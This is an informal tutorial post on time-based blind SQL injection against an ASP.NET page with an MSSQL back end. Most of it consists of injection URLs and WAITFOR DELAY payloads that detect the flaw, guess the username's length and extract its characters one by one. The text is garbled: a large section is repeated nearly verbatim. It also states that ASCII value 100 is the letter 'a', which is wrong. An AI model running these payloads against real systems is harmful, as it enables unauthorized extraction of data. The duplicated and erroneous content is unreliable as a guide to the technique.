Hello Guyzz...sorry for Time lapse between posts...
Today m gonna discuss something about Time based SQL injection. You might have heard about Error based SQL injection which occurs due to Improper Input Validation at server side. Time based SQL Injection is among category of SQL injection that does not shows any error messages. Therefore exploiting a Time based SQL injection is often tedious job.
Detection of Time based SQL Injection
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:10’--
The application responded in 13.87 sec.
Another Payload can be injected in similar manner to confirm the detection of SQL
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:20’--
TThis time application responded in 24 sec
Now third payload is injected to confirm that result is not False Positive
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:30’--
Application responeded in 34 sec.
Therefore it is quite certain that we are able to control the application behavior and our query waitfor delay '0:0:20' in actually executing at server side. This confirms the presence of Time based SQL Injection.
Exploitation
Now it is time to exploit the vulnerability to obtain some useful information.
The basic idea behind exploiting this vulnerability is to test for a condition and ask some True and False question from database and on basis of response from database values are guessed character by character, this is what that makes it more tedious but quite interesting feature.
application responded in 24.36 sec.
Now is the time to obtain database username character by character. To obtain username we need to guess the character one by one. First we start with condition to test whether starting character used in database username is in lowercase or uppercase . we crafted the following condition :
if (ascii(lower(substring((user),1,1)))>97) WAITFOR DELAY '00:00:10'—
Here 97 is ascii value of character ' a ' so from here it is sure that first character is in small case .
Now we start with testing for character. To do this in less number of iterations we take ascii value 113 . Again same query was crafted
if (ascii(lower(substring((user),1,1)))<113) WAITFOR DELAY '00:00:10'—
Application responded +vely so we got information that character lies between 97-113.
Now we will follow same strategy and find lowest possible range between which character can occur.After we got lowest range we test for equality condition
Today m gonna discuss something about Time based SQL injection. You might have heard about Error based SQL injection which occurs due to Improper Input Validation at server side. Time based SQL Injection is among category of SQL injection that does not shows any error messages. Therefore exploiting a Time based SQL injection is often tedious job.
Detection of Time based SQL Injection
From
the manual web security assessment it was observed that application was vulnerable
to Time based SQL Injection. Often
people ( web admins) do not take it seriously and ignore such vulnerabilities
with reason that it does not reveal their data but it can also be exploited to gain remote database information .
For example take an application which generates a parameter xyz=<some id> in response to a request made to web application . SQL Time based payload can be injected into parameter in folllowing manner
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:10’--
The application responded in 13.87 sec.
Another Payload can be injected in similar manner to confirm the detection of SQL
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:20’--
TThis time application responded in 24 sec
Now third payload is injected to confirm that result is not False Positive
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27’waitfordelay’0:0:30’--
Application responeded in 34 sec.
Therefore it is quite certain that we are able to control the application behavior and our query waitfor delay '0:0:20' in actually executing at server side. This confirms the presence of Time based SQL Injection.
Exploitation
Now it is time to exploit the vulnerability to obtain some useful information.
The basic idea behind exploiting this vulnerability is to test for a condition and ask some True and False question from database and on basis of response from database values are guessed character by character, this is what that makes it more tedious but quite interesting feature.
To obtain database user name first we will try to guess the length username using following request to server:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if
(len(user)=1)waitfor delay'0%3a0%3a20'—
If length of user would have been 1 then application would have responded in time more than 20 sec, but actual response achieved was in just 3-4 sec.
Similarily user length was increased to 2 ,3,4, and so on and appplication responded positively for len=7 , which confirms that length of database username will be of 7 character.
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if
(len(user)=7)waitfor delay'0%3a0%3a20'—
application responded in 24.36 sec.
Now is the time to obtain database username character by character. To obtain username we need to guess the character one by one. First we start with condition to test whether starting character used in database username is in lowercase or uppercase . we crafted the following condition :
if (ascii(lower(substring((user),1,1)))>97) WAITFOR DELAY '00:00:10'—
Here 97 is ascii value of character ' a ' so from here it is sure that first character is in small case .
Now we start with testing for character. To do this in less number of iterations we take ascii value 113 . Again same query was crafted
if (ascii(lower(substring((user),1,1)))<113) WAITFOR DELAY '00:00:10'—
Application responded +vely so we got information that character lies between 97-113.
Now we will follow same strategy and find lowest possible range between which character can occur.After we got lowest range we test for equality condition
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733'if
(ascii(lower(substring((user),1,1)))=100)waitfor delay '0:0:20'--
application responded in 25 sec. which gave us first charcater for our database user name ,ie, 'a'
Like wise second character and entire database username tables and values can be guessed using the above defined strategy, and some customized queries which i leave it to u for research.
Database username so obtained was 'admindb'
Hope u all will be benefited by this post
Thanks
